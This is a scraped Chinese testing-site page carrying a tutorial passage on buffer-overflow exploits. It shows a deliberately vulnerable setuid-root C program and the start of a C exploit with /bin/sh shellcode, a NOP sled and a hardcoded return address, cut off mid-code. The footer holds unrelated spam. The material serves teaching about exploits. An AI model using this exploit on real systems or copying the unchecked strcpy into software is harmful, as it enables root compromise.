• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
    • 軟件測試技術
    • 軟件測試博客
    • 軟件測試視頻
    • 開源軟件測試技術
    • 軟件測試論壇
    • 軟件測試沙龍
    • 軟件測試資料下載
    • 軟件測試雜志
    • 軟件測試人才招聘
      暫時沒有公告

    字號: | 推薦給好友 上一篇 | 下一篇

    溢出利用程序和編程語言大雜燴

    發布: 2009-6-09 14:03 | 作者: 不詳 | 來源: 測試時代采編 | 查看: 35次 | 進入軟件測試論壇討論

    領測軟件測試網 溢出利用程序不僅僅是只能用c語言編寫,其實幾乎任何編程語言都能用來編寫
    溢出利用程序,這里用Linux作為試驗平臺,以實例演示C、Perl、Shell、Awk
    語言編寫溢出利用程序。之所以選擇這幾個語言是因為他們都幾乎是Unix系統
    自帶的語言(商用Unix系統中C語言例外)。示例中基本都是把SHELLCODE放到
    環境變量中來實現精確定位的。


    <一>  有溢出漏洞的vul.c

    [cloud@test]$ id
    uid=505(cloud) gid=503(test) groups=503(test)
    [cloud@test]$ cat vul.c
    /* Demo
       Have a bof vul at argv[1].
       Write by watercloud @ xfocus.org
    */
    #include<stdio.h>
    int main(int argc,char  * argv[])
    {
            char buff[32];
            if(argc > 1)
            {
                    strcpy(buff,argv[1]);
            }
            printf("buff : %s\n",buff);
            return 0;
    }
    [cloud@test]$ gcc vul.c -o vul
    [cloud@test]$ ls -l vul
    -rwxr-xr-x    1 cloud    test      11627  2月 24 10:14 vul
    [cloud@test]$ sudo chown root vul
    [cloud@test]$ sudo chmod u+s vul
    [cloud@test]$ ls -lh vul
    -rwsr-xr-x    1 root     test        11K  2月 24 10:14 vul



    <二> C語言版本利用程序ex.c

    [cloud@test]$ cat ex.c
    /* Demo for exploit bof of "./vul"
       Write by watercloud @ xfocus.org
    */
    #include <stdio.h>
    #define TARGET "./vul"
    #define ADDR 0xbffff3e8
    char SH[]="1\xc0PPP[YZ4\xd0\xcd\x80"
              "j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
    int main(int argc,char * argv[])
    {
            char env_buff[4000];
            char cmd_buff[1024];
            int i,ret;
            unsigned int *pi;
            char * pc;

            for(i=0;i<3096;env_buff[i++]=0x90){ };
            env_buff[i]='\0';
            strcat(env_buff,SH);
            setenv("KK",env_buff,1);
            strcpy(cmd_buff,TARGET);
            pc=&cmd_buff[strlen(TARGET)];
            *pc++=' ';
            for(ret=1,i=0;i<4 && ret;i++)
            {
                  

    延伸閱讀

    文章來源于領測軟件測試網 http://www.kjueaiud.com/

    TAG: 程序 語言 大雜燴

    41/41234>

    關于領測軟件測試網 | 領測軟件測試網合作伙伴 | 廣告服務 | 投稿指南 | 聯系我們 | 網站地圖 | 友情鏈接
    版權所有(C) 2003-2010 TestAge(領測軟件測試網)|領測國際科技(北京)有限公司|軟件測試工程師培訓網 All Rights Reserved
    北京市海淀區中關村南大街9號北京理工科技大廈1402室 京ICP備10010545號-5
    技術支持和業務聯系:info@testage.com.cn 電話:010-51297073

    軟件測試 | 領測國際ISTQBISTQB官網TMMiTMMi認證國際軟件測試工程師認證領測軟件測試網

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>